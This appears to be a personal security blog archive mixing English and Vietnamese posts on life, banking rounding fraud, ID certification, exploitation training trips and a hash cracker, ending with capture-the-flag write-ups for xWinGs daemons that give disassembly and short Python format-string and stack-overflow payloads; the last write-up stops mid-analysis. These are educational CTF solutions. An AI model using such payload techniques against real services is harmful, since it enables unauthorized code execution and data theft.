So, it's been half a year. It's been half a year in turbulence.

On Jan 1st, I was so eager, excited, and hopeful on my flight home. I had a plan, a simple plan, and it was rolling well. You see, what could be easier than finding a job, working for a few years, and then taking a higher degree? I thought this'd gotta be it, that I found my future.

Then it all broke apart. It's funny though, cuz I was afraid of exactly this from the beginning. I could tell it was too good to be true, that everything was like arranged, granted, not earned, and so something got to be missing. I mean, come on, you don't expect to see a perfect world, do you? The problem was it happened too late! I was so into it. I bet on it with everything I had.

I lose my bet. My plan went to trash. I declined a few job offers to open my own consulting firm. I am still not sure why I did that. I might have thought the market demand was high, or it might be cool to do it, or it was just a rebelious action to satisfy my ego. Regardless, I have a firm now. And it is the reason I write this piece.

The firm is doing well according to plan. Before you ask, no, this is not the plan I talked before. This has its share of late night's oil burning, sweats and a few grey hairs. It has ups and downs, cheers and cries. And it is not perfect. It is so much different from going to work at 09:00, coming back at 18:00, having dinner till 20:00, spending a few hours doing god-knows-what in front of the monitor, and finally lying on the floor till tomorrow. It is no longer a pleasant life for me at all.

Thinking about the firm reminds me of all the good times in the island country, where I didn't have to think about anything. I miss the nights we hung out. I miss the trees along the road. I miss the breezy cool wind on the way home. I miss the flat. I miss late night movies/series. I miss the nights I slept on the floor. I miss the morning green bean dessert and bean curd. Life was a pleasure ride in the park. I earned a comfortable salary so I didn't have to think twice before spending. I lived in a spacious and windy flat. I owned a motorbike. I had everything I needed. I was contended.

Now, my head is full of questions. What is the next step, how to move forward, who is the next customer, how to approach them, who to partner with, where to find money to do those stuffs... Infrastructure, marketing, human resource, finance, law, etc. all come pouring down on me. These questions don't seem to end at all. Instead, they become more and more challenging, they push me closer and closer to the wall.

Sure I have doubts. Is the market ripe for us? Isn't it better to do business elsewhere? Was coming back just plain wrong? These questions keep whirling wildly. My thoughts are all interwound, messed up.

Fortunately, everytime I think about them, I always come to the same answer: that I can't change what happened, I can only fix them. So that's exactly what I'm doing. I founded a firm, so I've gotta take it high. I failed a plan, so I've gotta work another one.

Though I've lost the eagerness and excitement of the flight that day, I still have hope. When the turbulence is over, we'll have a safe landing on the long runway.

Những nhà quản trị đã quá quen thuộc với bộ công cụ của SysInternals như Process Explorer, TcpView, Rootkit Revealer. Các công cụ này đã rất dễ được tải về và sử dụng, giờ đây lại càng dễ hơn nữa. Ví dụ như bạn có thể chạy ngay công cụ Process Explorer mới nhất bằng cách gõ dòng lệnh:

\\live.sysinternals.com\procexp.exe

Quá đơn giản, phải không? Danh sách tất cả các công cụ có thể được xem tại http://live.sysinternals.com.

Sáng nay khoảng 10:00 mình ra ngân hàng ACB ở đường Xuân Hồng, ngay phía sau khu triển lãm Tân Bình để đổi 100 đồng Mỹ ra tiền Việt.

Theo tỉ giá của ngày hôm nay thì mình sẽ nhận được 1,616,300. Trong giấy chi cũng ghi rõ con số này.

Thế nhưng nhân viên ở quầy chỉ đưa mình 1,616,000. Tức là thiếu 300 đồng.

Mình hỏi lại nhân viên đó rằng tại sao lại làm tròn xuống thế này và nhận được câu trả lời là cho dù mình có 499 đồng thì cũng vẫn làm tròn xuống như vậy.

Trước hết, ở những ngân hàng khác mình thường lui tới thì không bao giờ có chuyện làm tròn số như thế này. 1 cent là 1 cent. 100 đồng là 100 đồng. Họ sẽ đưa đủ. Mặc dù mình chưa thấy trường hợp nào họ đưa "dư" :-D nhưng thiếu thì chắc chắn là không.

Thứ hai, không biết là chính sách làm tròn xuống gây thiệt hại cho khách hàng như thế này là của chính nhân viên quầy tự ý vì mục đích riêng, hay là của toàn ngân hàng.

Đây rõ ràng là một ví dụ điển hình và thực tế về "bòn rút" (salami attack) trong lĩnh vực an toàn thông tin. Salami attack là những sự việc nhỏ nhặt nhưng xảy ra trên một quy mô lớn ví dụ như hàng trăm ngàn tài khoản trong ngân hàng bị bòn rút 100 đồng thì kết quả sẽ là một thiệt hại cỡ vài trăm triệu đồng. Đối với từng chủ tài khoản, sự hao hụt 100 đồng này không dễ phát hiện ra cho nên salami attack thường ít khi bị phát hiện.

Dù sao đi nữa thì ACB cũng đã mất đi một khách hàng (cho dù là nhỏ) cho tới khi mình nghe được tin tức khác. Bởi vì đã không làm tròn lên thì chớ có chuyện làm tròn xuống. Câu nói khách hàng là thượng đế ở đâu rồi?

This small snippet is copied from a much popular application.

.text:1000EBE0 push ecx ; some_string
.text:1000EBE1 push '%'
.text:1000EBE3 push '%'
.text:1000EBE5 push offset aCsystemdriveCS ; "%cSystemDrive%c%s"
.text:1000EBEA push edx ; buffer
.text:1000EBEB call ds:swprintf

Translated to C:

swprintf(buffer, "%cSystemDrive%c%s", '%', '%', some_string);

Of course you'd be scratching your head to explain why the writer wrote it this way, instead of simply swprintf(buffer, "%%SystemDrive%%%s", some_string);. To show off great C-kungfu? Or the lack thereof? Anyway, I just thought it was funny enough to post.

Mở công ty, mua bán nhà, xin cho con đi học, làm đơn xin học bổng, v.v... đều cần đến bản sao CMND. Và thông thường các bản sao này nhất định phải có con dấu chứng thực của Ủy ban nhân dân phường.

Nhưng liệu việc chứng thực có tác dụng hay không, hay chỉ là hình thức dư thừa (red tape) mà tất cả các quốc gia khác trên thế giới đều đang muốn cắt giảm?

Tôi đem 5 bản sao giấy CMND ra UBND phường xin chứng thực sao y bản chính. Bản sao của tôi là hai mặt CMND trên cùng một mặt giấy khổ A5, cách nhau một khoảng trống vừa đủ để một con dấu chứng thực đè lên cả hai mặt CMND. Nhân viên UBND trả lời rằng sao chép như vậy không đúng quy cách và yêu cầu sử dụng dịch vụ ở ngay tại UBND phường. Họ sao chép 2 mặt CMND trên 2 mặt giấy của cùng một tờ giấy nhỏ. Khi chứng thực, nhân viên UBND phường không hề nhìn tới mặt sau của CMND (nơi ghi rõ dấu hiệu nhận dạng và ngày cấp CMND) cũng như chỉ đóng dấu chứng thực vào một mặt của bản sao!

Câu hỏi được đặt ra là:

1. Nếu không kiểm tra giữa bản chính và bản sao, ý nghĩa của việc chứng thực là gì?
2. Con dấu chứng thực chỉ đóng ở một mặt, mặt còn lại liệu có còn giá trị chứng thực?
3. Tại sao một bản sao mắc phải những lỗi nghiêm trọng ảnh hướng đến tính chính xác của thông tin được cho là đúng quy cách?

Một câu hỏi quan trọng, và tổng quát hơn là tại sao việc chứng thực lại cần thiết? Dù đã có một bản sao chứng thực, mọi người vẫn bắt buộc phải đem bản chính theo để các cơ quan khác kiểm tra lại. Bỏ qua việc họ có kiểm tra lại hay không, vấn đề là với bản chính đem theo đó, các cơ quan khác có thể dễ dàng tạo ra các bản sao ngay lập tức. Việc này vừa loại bỏ đi một phiền hà không đáng có, vừa đảm bảo tính trung thực của thông tin.

Xin lưu ý rằng chúng ta chưa nói đến tính chính xác của thông tin được chứng thực trong bài này.

Theo báo Sài Gòn Giải Phóng ngày 31 tháng 03 năm 2008, lực lượng công an đã bắt được một vài nhóm tội phạm từ các quốc gia khác giả mạo chữ ký và thẻ tín dụng để mua hàng và đánh cắp tiền từ các ngân hàng Việt Nam.

Theo tin đã đưa thì một nhóm từ Nigeria bị bắt trong khi đang dùng thẻ tín dụng giả để thanh toán tại siêu thị. Rất may là nhân viên siêu thị đã nghi ngờ tên trên thẻ không phải tên của gã nên đã tri hô bảo vệ siêu thị tóm lấy tên tội phạm này.

Tin thứ hai, và là điểm chính của bài này, là một vài nhóm tội phạm khác đã tinh vi hơn. Chúng giả chữ ký thực hiện lệnh chuyển tiền từ một tài khoản ở nước ngoài vào một ngân hàng trong nước vào ngày x. Sau đó, chúng ra ngân hàng rút hết tiền vào ngày x + y. Đến khi ngân hàng nước ngoài phát hiện ra chữ ký giả và thực hiện lệnh hủy việc chuyển tiền thì lúc này đã vào ngày x + y + z.

Có hai câu hỏi đặt ra ở đây:

1. Tại sao không có thời gian hãm tài để cả hai phía xác nhận lệnh chuyển tiền là thật?
2. Phía nào sẽ chịu trách nhiệm cho sự sai sót này?

Jaan Yeh, a final year student at Malaysia Multimedia University (MMU) invited to me to its Melaka campus to conduct another training on software exploitation. I was ready and eager to take on this first overseas training engagement. But little did I know there was a big surprise awaiting.

Arriving at the Kuala Lumpur International Airport a day before the training started, I was welcomed by three fellas who were going to be in the workshop. One of them is from the nearby Cyberjaya campus, the other two are flat-mates at the Melaka campus. It was around 2:30pm and these fellas had not had any food yet. So shortly after a quick Burger King meal, we headed to our training site, a two-hour drive away.

Melaka is a rustic old Portugal port settlement with small houses, narrow streets, and great seafood! On the first night there, the chaps took me out to a "satay" house. But this satay is different from the satay in Singapore where they grill chicken and paste on some satay. This satay is a steamboat, or, at least, a steam-pot. We dunked all the raw meat into a boiling pot and had a leisure talk while waiting for them to be edible. The best thing about this place is they sell big prawn, 20cm long prawn, for 60 cents (RMY 0.60). That's a steal! On my last night there, we again had seafood, this time by the sea. That night's meal could have cost about RMY 300 if we had had it in Singapore. Here, it was only RMY 120. Cheap!

If food is the second best thing in this trip, the best is gonna be the training itself. And as I said, there was a big surprise for me. I thought this training was only for 12 students majoring in IT Security. It turned out there were only 9 students (Fabian, Nan, Jeremy, Yeh, Aidid, Wee, Zeon, Tan, Najib), and only one of them is from IT Security. The others are from Data Communication, Knowledge Management, etc. A multi-disciplined group. Not only that, two of the lecturers (Muslim, and Hadi) from Faculty of Engineering and Technology (FET) and one professional (Victor) from F-Secure malware analysis lab (in KL) also joined in. It was a big turn out. The biggest surprise though, was that Najib was in wheelchair! Man, I couldn't imagine the training would be so well received. Thank you for your passion and presence, Najib!

Throughout the whole workshop, everyone was able to conduct the analysis, and exploits themselves. One of them (Tan) even solved a quiz within only 20 minutes (two-thirds the allowed time). Fabian, Yeh, Zeon got stuck with it for a few minutes but managed to pull it off successfully too. I shouldn't praise Hadi, Muslim and Victor here because that was kind of expected of them but they made me feel like I was teaching the oh-so-obvious stuffs. I was also glad that Najib got the gist of a successful format string exploitation.

The training lasted a little bit more than 2 days because these participants demanded more deep technical explanation than an average Joe and I also allowed them to play around with their creativity a little bit more. In general, I say the training was another success.

Not only was the trip a gastronomy treat, it was also a personal fulfillment. I managed to buy a book that I could not find in many bookstores in Singapore nor Sydney. I also got some presents home. The last day is the best polishing touch to this whole wonderful trip.

Thank you Jaan Yeh for the invitation, and your hospitality. Thank you Muslim for providing necessary facility. And thank you everyone for your active participation! Keep the interest level high, will ya?

He is a brilliant guy. Under his usual silence is the loud noise of his neuron machine cranking up and down. I am talking about Jeremy, a student in my software exploitation training in October.

Few days ago, he messaged me that he had been offered an internship with DSO (used to stand for Defense Science Organization), Singapore. This organization, among others, deals with national security and only accepts top Singapore citizens to join its rank. Being able to join DSO as a Software Pentester (I assume it deals with analysis and exploitation here) proved Jeremy a technically smart guy.

Congratulation to you, Jeremy!

And for me, I am so glad my training paid off well.

During the HITB 2007 Malaysia I met a young smart group of students from Singapore Polytechnic. They took part in the Capture the Flag competition and managed to score better than some professionals (need I make it clear?) in total contrast to their name: t3nth (they ranked eighth, by the way).

I thought that was impressive enough for these young chaps and maybe if they had proper training, they could turn as capable as any other qualified security engineer. And so I offered them a free workshop on software exploitation to serve as a primer. It was received enthusiastically.

An intensive four (or five, I dont quite remember)-session training was given on every week end through out last month. It covered all basic concepts, techniques, and some few advanced skills. I don't know but it seemed like the boys grasped them pretty quickly. Actually, they surprised me! I didn't expect that Paul could understand the stack diagram I drew on the white board in an instance, Louis would get the return-to-libc technique immediately when I mentioned it, Jeremy were able to analyze binary files in a few minutes, and Choon Rui mastered format string with no difficulty at all.

Through out the training, challenges from the CtF (no, not the binary, but with reconstructed source by yours truly) were used but these boys weren't informed at all. They solved them, fluidly. What others weren't able to do in Dubai 2007, and Malaysia 2007, they did it in only one or a few hours. Brilliant, ain't they?

I hope it was a conducive workshop to them and that they loved it as much as I loved teaching them. It's always a pleasure to work with smart guys. I believe these chaps will score much better in subsequent challenges. And if you are looking for interns, get them!

hashcrack is a fast (as fast as OpenSSL allows) hash cracker. It features an additive hash checking to speed up the process. For example, to check for the hashes of abc and abd, hashcrack only computes the hash of ab, then computes one round each for c and d totaling 4 rounds (two for ab, one for c and one for d). This eliminates a good number of rounds if we calculate hashes from the beginning (6 in this case). The longer the key, the more the saving.

A draw back to this feature is it does not work with non-additive hash algorithms. Luckily, popular algorithms, such as SHA-1, RIPEMD160, MD5, are additive.

Compared to vshark (another hash cracker by rd), hashcrack is so much faster. An unscientific benchmark to RIPEMD160-scan the whole 6-character a-zA-Z0-9 space ended in about 6 minutes with hashcrack, and more than 2 hours with vshark. To be fair to vshark, there was another version of hashcrack written in pure Python. It was 6 times slower than vshark.

Download hashcrack

Analyzing main

There really is nothing to analyze here. It's plain to see that the last printf was called without any format string.

.text:08048A8E main            proc near               ; DATA XREF: start+17↑o
.text:08048A8E
.text:08048A8E var_118         = dword ptr -118h
.text:08048A8E var_114         = dword ptr -114h
.text:08048A8E var_110         = dword ptr -110h
.text:08048A8E var_108         = dword ptr -108h
.text:08048A8E
.text:08048A8E                 push    ebp
.text:08048A8F                 mov     ebp, esp
.text:08048A91                 sub     esp, 118h       ; char *
.text:08048A97                 and     esp, 0FFFFFFF0h
.text:08048A9A                 mov     eax, 0
.text:08048A9F                 add     eax, 0Fh
.text:08048AA2                 add     eax, 0Fh
.text:08048AA5                 shr     eax, 4
.text:08048AA8                 shl     eax, 4
.text:08048AAB                 sub     esp, eax
.text:08048AAD                 mov     [esp+118h+var_118], offset aCodedByXwings_ ; "Coded By xWinGs. a code just to make yo"...
.text:08048AB4                 call    _printf
.text:08048AB9                 mov     [esp+118h+var_118], offset aSecretCode ; "Secret Code: "
.text:08048AC0                 call    _printf
.text:08048AC5                 mov     eax, ds:stdout
.text:08048ACA                 mov     [esp+118h+var_118], eax
.text:08048ACD                 call    _fflush
.text:08048AD2                 mov     [esp+118h+var_110], 100h
.text:08048ADA                 lea     eax, [ebp+var_108]
.text:08048AE0                 mov     [esp+118h+var_114], eax
.text:08048AE4                 mov     [esp+118h+var_118], 0
.text:08048AEB                 call    _read
.text:08048AF0                 mov     ds:dword_8052998, eax
.text:08048AF5                 mov     [esp+118h+var_110], offset aEtcFlagsDaemon ; "/etc/flags/daemon07.txt"
.text:08048AFD                 mov     eax, ds:dword_8052998
.text:08048B02                 mov     [esp+118h+var_114], eax
.text:08048B06                 lea     eax, [ebp+var_108]
.text:08048B0C                 mov     [esp+118h+var_118], eax
.text:08048B0F                 call    sub_80489C4
.text:08048B14                 mov     [esp+118h+var_118], offset aWrongCode_Debu ; "Wrong Code.\nDebug Input : "
.text:08048B1B                 call    _printf
.text:08048B20                 lea     eax, [ebp+var_108]
.text:08048B26                 mov     [esp+118h+var_118], eax
.text:08048B29                 call    _printf
.text:08048B2E                 mov     eax, 0
.text:08048B33                 leave
.text:08048B34                 retn
.text:08048B34 main            endp

Exploit it

So, it's a simple format string exploit. We will overwrite the end of .dtors to point to the easter-egg function at 08048A32.

.text:08048A32 ; ---------------------------------------------------------------------------
.text:08048A32                 push    ebp
.text:08048A33                 mov     ebp, esp
.text:08048A35                 sub     esp, 48h
.text:08048A38                 mov     dword ptr [esp+4], offset aR ; "r"
.text:08048A40                 mov     dword ptr [esp], offset aEtcFlagsDaemon ; "/etc/flags/daemon07.txt"
.text:08048A47                 call    _fopen
.text:08048A4C                 mov     [ebp-0Ch], eax
.text:08048A4F                 mov     eax, [ebp-0Ch]
.text:08048A52                 mov     [esp+8], eax
.text:08048A56                 mov     dword ptr [esp+4], 20h
.text:08048A5E                 lea     eax, [ebp-38h]
.text:08048A61                 mov     [esp], eax
.text:08048A64                 call    _fgets
.text:08048A69                 mov     eax, [ebp-0Ch]
.text:08048A6C                 mov     [esp], eax
.text:08048A6F                 call    _fclose
.text:08048A74                 lea     eax, [ebp-38h]
.text:08048A77                 mov     [esp+4], eax
.text:08048A7B                 mov     dword ptr [esp], offset aS ; "\n%s"
.text:08048A82                 call    _printf
.text:08048A87                 mov     eax, 0
.text:08048A8C                 leave
.text:08048A8D                 retn

These few lines of Python code are all it takes to construct an exploit.

dtors_addr = 0x08052804
target_addr = 0x08048A32
offset = 8

junk_cnt0 = offset * 4
junk_cnt1 = (target_addr & 0xFFFF) - junk_cnt0
junk_cnt2 = 0x10000 + ((target_addr & 0xFFFF0000) >> 16) - junk_cnt1 - junk_cnt0

fmtstring = struct.pack("I", dtors_addr) + struct.pack("I", dtors_addr + 2) + "aaaa" * (offset - 2)
fmtstring += "%%.%dx%%%d$hn" % (junk_cnt1, offset)
fmtstring += "%%.%dx%%%d$hn" % (junk_cnt2, offset + 1)
fmtstring += "\n"
# send this string to port 7777, will ya?

Observation

Unlike daemon05, we need not flush the buffer in printf because when the daemon ends normally, this buffer is automatically flushed. And the daemon does end normally. Let's find out why.

.dtors:08052800 _dtors          segment dword public 'DATA' use32
.dtors:08052800                 assume cs:_dtors
.dtors:08052800                 ;org 8052800h
.dtors:08052800                 db 0FFh
.dtors:08052801                 db 0FFh
.dtors:08052802                 db 0FFh
.dtors:08052803                 db 0FFh
.dtors:08052804                 db    0
.dtors:08052805                 db    0
.dtors:08052806                 db    0
.dtors:08052807                 db    0
.dtors:08052807 _dtors          ends
.dtors:08052807
.jcr:08052808 ; ---------------------------------------------------------------------------
.jcr:08052808
.jcr:08052808 ; Segment type: Pure data
.jcr:08052808 ; Segment permissions: Read/Write
.jcr:08052808 _jcr            segment dword public 'DATA' use32
.jcr:08052808                 assume cs:_jcr
.jcr:08052808                 ;org 8052808h
.jcr:08052808                 db    0
.jcr:08052809                 db    0
.jcr:0805280A                 db    0
.jcr:0805280B                 db    0
.jcr:0805280B _jcr            ends

Right after .dtors is .jcr which is filled with four 00, which incidentally is also the end marker for .dtors. So, when we overwrite 08052804 with the value 08048A32, we happen to insert a destructor to .dtors list. If .jcr were different, we would have to overwrite .jcr to point to the fflush code in main, which is at 08048AC5. This is still doable by extending our format string to have two more %hn overwrites.

Oh, and thank you, xWinGs, for these easy points.

Identify main

Like the previous blog post, let's start with the start function.

.text:080488B0                 public start
.text:080488B0 start           proc near
.text:080488B0                 xor     ebp, ebp
.text:080488B2                 pop     esi
.text:080488B3                 mov     ecx, esp
.text:080488B5                 and     esp, 0FFFFFFF0h
.text:080488B8                 push    eax
.text:080488B9                 push    esp
.text:080488BA                 push    edx
.text:080488BB                 push    offset sub_804C650
.text:080488C0                 push    offset sub_804C5F0
.text:080488C5                 push    ecx
.text:080488C6                 push    esi
.text:080488C7                 push    offset main
.text:080488CC                 call    ___libc_start_main

We identify the main function as the last argument to ___libc_start_main. So let's get to it.

Analyze main

.text:08048ABE main            proc near               ; DATA XREF: start+17↑o
.text:08048ABE
.text:08048ABE var_518         = dword ptr -518h
.text:08048ABE var_514         = dword ptr -514h
.text:08048ABE var_510         = dword ptr -510h
.text:08048ABE var_208         = dword ptr -208h
.text:08048ABE
.text:08048ABE                 push    ebp
.text:08048ABF                 mov     ebp, esp
.text:08048AC1                 sub     esp, 518h       ; char *
.text:08048AC7                 and     esp, 0FFFFFFF0h
.text:08048ACA                 mov     eax, 0
.text:08048ACF                 add     eax, 0Fh
.text:08048AD2                 add     eax, 0Fh
.text:08048AD5                 shr     eax, 4
.text:08048AD8                 shl     eax, 4
.text:08048ADB                 sub     esp, eax
.text:08048ADD                 mov     [esp+518h+var_518], offset aCodedByXwings_ ; "Coded By xWinGs. a code just to make yo"...
.text:08048AE4                 call    _printf
.text:08048AE9                 mov     [esp+518h+var_518], offset aSecretCode ; "Secret Code: "
.text:08048AF0                 call    _printf
.text:08048AF5                 mov     eax, ds:stdout
.text:08048AFA                 mov     [esp+518h+var_518], eax
.text:08048AFD                 call    _fflush
.text:08048B02                 mov     [esp+518h+var_510], 200h
.text:08048B0A                 lea     eax, [ebp+var_208]
.text:08048B10                 mov     [esp+518h+var_514], eax
.text:08048B14                 mov     [esp+518h+var_518], 0
.text:08048B1B                 call    _read
.text:08048B20                 mov     ds:dword_80529DC, eax
.text:08048B25                 mov     [esp+518h+var_510], offset aEtcFlagsDaemon ; "/etc/flags/daemon05.txt"
.text:08048B2D                 mov     eax, ds:dword_80529DC
.text:08048B32                 mov     [esp+518h+var_514], eax
.text:08048B36                 lea     eax, [ebp+var_208]
.text:08048B3C                 mov     [esp+518h+var_518], eax
.text:08048B3F                 call    sub_80489F4

First, a few calls to printf to advertise this is from xWinGs. Nothing fancy yet. Then a read of 0x200 (1024) bytes to var_208. So, let's rename var_208 to input_buffer. And also note that input_buffer is the first item on the stack. After input_buffer there comes the frame pointer and a return address.

With the same reasoning as in the previous post, we also rename var_518 to first_arg, var_514 to second_arg, and var_510 to third_arg.

After the read is a check for score server packet. We'll skip it. And here comes the juicy part.

.text:08048B44                 mov     eax, ds:stdin
.text:08048B49                 mov     [esp+518h+third_arg], eax
.text:08048B4D                 mov     [esp+518h+second_arg], 300h
.text:08048B55                 lea     eax, [ebp+input_buffer]
.text:08048B5B                 mov     [esp+518h+first_arg], eax
.text:08048B5E                 call    _fgets
.text:08048B63                 mov     [esp+518h+first_arg], offset aWrongCode_ ; "Wrong Code.\n"
.text:08048B6A                 call    _printf
.text:08048B6F                 mov     eax, 0
.text:08048B74                 leave
.text:08048B75                 retn
.text:08048B75 main            endp

The next call is to fgets to read another, uhm, 0x300 bytes to input_buffer. And this is where overflow occurs. Remember that input_buffer is only 1024 byte long, and after it is the frame pointer and return address. So by overflowing input_buffer we are able to control the return address.

Ok, that's all fine, but where do we want main to return to? A little digging around reveals this piece of unidentified code.

.text:08048A60 locret_8048A60:                         ; CODE XREF: sub_80489F4+29↑j
.text:08048A60                 leave
.text:08048A61                 retn
.text:08048A61 sub_80489F4     endp
.text:08048A61
.text:08048A62 ; ---------------------------------------------------------------------------
.text:08048A62                 push    ebp
.text:08048A63                 mov     ebp, esp
.text:08048A65                 sub     esp, 48h
.text:08048A68                 mov     dword ptr [esp+4], offset aR ; "r"
.text:08048A70                 mov     dword ptr [esp], offset aEtcFlagsDaemon ; "/etc/flags/daemon05.txt"
.text:08048A77                 call    _fopen
.text:08048A7C                 mov     [ebp-0Ch], eax
.text:08048A7F                 mov     eax, [ebp-0Ch]
.text:08048A82                 mov     [esp+8], eax
.text:08048A86                 mov     dword ptr [esp+4], 20h
.text:08048A8E                 lea     eax, [ebp-38h]
.text:08048A91                 mov     [esp], eax
.text:08048A94                 call    _fgets
.text:08048A99                 mov     eax, [ebp-0Ch]
.text:08048A9C                 mov     [esp], eax
.text:08048A9F                 call    _fclose
.text:08048AA4                 lea     eax, [ebp-38h]
.text:08048AA7                 mov     [esp+4],;;; eax
.text:08048AAB                 mov     dword ptr [esp], offset aS ; "\n%s"
.text:08048AB2                 call    _printf
.text:08048AB7                 mov     eax, 0
.text:08048ABC                 leave
.text:08048ABD                 retn
.text:08048ABE
.text:08048ABE ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
.text:08048ABE
.text:08048ABE ; Attributes: bp-based frame
.text:08048ABE
.text:08048ABE main            proc near               ; DATA XREF: start+17↑o
.text:08048ABE
.text:08048ABE first_arg       = dword ptr -518h
.text:08048ABE second_arg      = dword ptr -514h
.text:08048ABE third_arg       = dword ptr -510h
.text:08048ABE input_buffer    = dword ptr -208h

Look at 08048A62! It's a function prologue. And indeed from 08048A62 to 08048ABD is a proper function! What great is that it opens, reads, and prints the flag out! This is so convenient!

Exploit it

Now, let's gather what we've have. We can control where main returns to, and we know there's a function that suits our purpose. Therefore, the challenge is... none. We just return to this function!

With that tactic, our exploit is as trivial as constructing a buffer containing all 08048A62. And how hard could it be? Two lines of Python code!

import struct
buffer = struct.pack("I", 0x08048A62) * 1000

Remotely exploit it

If you tried out the buffer above, you might find that it didn't work remotely. This is because the easter-egg function uses printf to print out the flag. It is common knowledge that printf buffers its content. If the output stream is connected to a console window, the buffering is line-based, otherwise it is block-based. In our case, the output stream is connected to a socket, so the buffering is block-based. Usually, this block is 8 KBytes. Each call to the easter-egg only prints out about 20 bytes. So, to fill this buffer, we will need at least 409 calls to the easter-egg function, or we need to put in 409 * 4 = 0x664 bytes. However, only 0x300 bytes are read in. So this approach fails.

Another approach is to flush the stream after printf. Luckily, this is doable by returning to 08048AF5. At that address, there is a call to fflush on stdout. Again, we only use existing code.

In summary, in order to exploit daemon05 remotely, we will have to change our buffer to look like:

buffer = struct.pack("I", 0x08048A62) * 300 + "\xF5\x8A\x04\x08" + "\x0A"

Observation

Well, what should I say? Thank you, xWinGs, for this twisted fun!

Identifying the main function

IDA will land us right here when it finishes analysis.

.text:08048830                 public start
.text:08048830 start           proc near
.text:08048830                 xor     ebp, ebp
.text:08048832                 pop     esi
.text:08048833                 mov     ecx, esp
.text:08048835                 and     esp, 0FFFFFFF0h
.text:08048838                 push    eax
.text:08048839                 push    esp
.text:0804883A                 push    edx
.text:0804883B                 push    offset sub_804C700
.text:08048840                 push    offset sub_804C6A0
.text:08048845                 push    ecx
.text:08048846                 push    esi
.text:08048847                 push    offset main
.text:0804884C                 call    ___libc_start_main

Notice at 08048847, I have renamed the function as main.

Analyzing main

Let's get to main now. The function starts with:

.text:08048AA1 main            proc near               ; DATA XREF: start+17↑o
.text:08048AA1
.text:08048AA1 first_arg       = dword ptr -2F8h
.text:08048AA1 second_arg      = dword ptr -2F4h
.text:08048AA1 third_arg       = dword ptr -2F0h
.text:08048AA1 var_2EC         = dword ptr -2ECh
.text:08048AA1 var_2E8         = dword ptr -2E8h
.text:08048AA1 var_260         = dword ptr -260h
.text:08048AA1 num_read        = dword ptr -25Ch
.text:08048AA1 input_buffer    = dword ptr -258h
.text:08048AA1 var_4C          = dword ptr -4Ch
.text:08048AA1 filename        = dword ptr -48h
.text:08048AA1
.text:08048AA1                 push    ebp
.text:08048AA2                 mov     ebp, esp
.text:08048AA4                 sub     esp, 2F8h       ; fildes
.text:08048AAA                 and     esp, 0FFFFFFF0h
.text:08048AAD                 mov     eax, 0
.text:08048AB2                 add     eax, 0Fh
.text:08048AB5                 add     eax, 0Fh
.text:08048AB8                 shr     eax, 4
.text:08048ABB                 shl     eax, 4
.text:08048ABE                 sub     esp, eax
.text:08048AC0                 mov     [esp+2F8h+first_arg], offset static_buffer
.text:08048AC7                 call    sub_80489E2
.text:08048ACC                 mov     [esp+2F8h+third_arg], 200h
.text:08048AD4                 mov     [esp+2F8h+second_arg], 0
.text:08048ADC                 lea     eax, [ebp+input_buffer]
.text:08048AE2                 mov     [esp+2F8h+first_arg], eax
.text:08048AE5                 call    _memset
.text:08048AEA                 mov     [esp+2F8h+third_arg], 40h
.text:08048AF2                 mov     [esp+2F8h+second_arg], 0
.text:08048AFA                 lea     eax, [ebp+filename]
.text:08048AFD                 mov     [esp+2F8h+first_arg], eax
.text:08048B00                 call    _memset
.text:08048B05                 mov     [esp+2F8h+second_arg], offset aProcSelfMaps ; "/proc/self/maps"
.text:08048B0D                 lea     eax, [ebp+filename]
.text:08048B10                 mov     [esp+2F8h+first_arg], eax
.text:08048B13                 call    _strcpy
.text:08048B18                 mov     [esp+2F8h+third_arg], 400h
.text:08048B20                 lea     eax, [ebp+input_buffer]
.text:08048B26                 mov     [esp+2F8h+second_arg], eax
.text:08048B2A                 mov     [esp+2F8h+first_arg], 0
.text:08048B31                 call    _read
.text:08048B36                 mov     [ebp+num_read], eax
.text:08048B3C                 cmp     [ebp+num_read], 0FFFFFFFFh
.text:08048B43                 jnz     short loc_8048B5D
.text:08048B45                 mov     [esp+2F8h+first_arg], offset aRead ; "read"
.text:08048B4C                 call    _perror
.text:08048B51                 mov     [esp+2F8h+first_arg], 1
.text:08048B58                 call    _exit

Well, you may have noticed that the names are not what you have in your IDA listing. These names are my names given to those identifiers after analyzing the function. So let's see how we could arrive to the same naming.

First, there is a call to sub_80489E2 and a static_buffer is passed to it. You will be right to guess this is some kind of initialization routine. Why static_buffer? Because it is static (located in .bss segment) and it is a buffer.

Next to it, some sort of buffer is reset to 0 with memset (0x200 bytes). Notice GCC uses mov instead of push to pass arguments to function. Some lowest (top) slots on the stack have been reserved for this purpose. So, a mov to the lowest slot is equivalent to the last push, or in other words, the first argument. And therefore I named the lowest slot first_arg, followed (logically) by second_arg and so on.

We see another buffer being reset to 0 (0x40 bytes). Then right after that, /proc/self/maps is strcpy'd to that buffer. Well, let's not waste anytime and mark it filename.

With one buffer marked, we still have one left. Luckily, the next call to read tells us that the remaining buffer should be named input_buffer. Right?

But, hey, wait, the read was for 0x400 bytes while input_buffer is only (0x258 - 0x4C) byte long. That is, if you fill input_buffer with (0x258 - 0x4C) bytes you will hit var_4C, and if you fill 4 bytes more than that, you will hit the beginning of filename. How wonderful! It gives you control over filename.

Let's move on.

.text:08048B5D loc_8048B5D:                            ; CODE XREF: main+A2↑j
.text:08048B5D                 mov     [esp+2F8h+third_arg], offset aEtcFlagsDaemon ; "/etc/flags/daemon01.txt"
.text:08048B65                 mov     eax, [ebp+num_read]
.text:08048B6B                 mov     [esp+2F8h+second_arg], eax
.text:08048B6F                 lea     eax, [ebp+input_buffer]
.text:08048B75                 mov     [esp+2F8h+first_arg], eax
.text:08048B78                 call    is_from_server
.text:08048B7D                 mov     [esp+2F8h+third_arg], offset static_buffer
.text:08048B85                 mov     eax, [ebp+num_read]
.text:08048B8B                 mov     [esp+2F8h+second_arg], eax
.text:08048B8F                 lea     eax, [ebp+input_buffer]
.text:08048B95                 mov     [esp+2F8h+first_arg], eax
.text:08048B98                 call    CRC32
.text:08048B9D                 mov     [ebp+var_4C], eax
.text:08048BA0                 cmp     [ebp+var_4C], 0FEEDAFEDh
.text:08048BA7                 jnz     short loc_8048C25
.text:08048BA9                 mov     [esp+2F8h+second_arg], offset aR ; "r"
.text:08048BB1                 lea     eax, [ebp+filename]
.text:08048BB4                 mov     [esp+2F8h+first_arg], eax
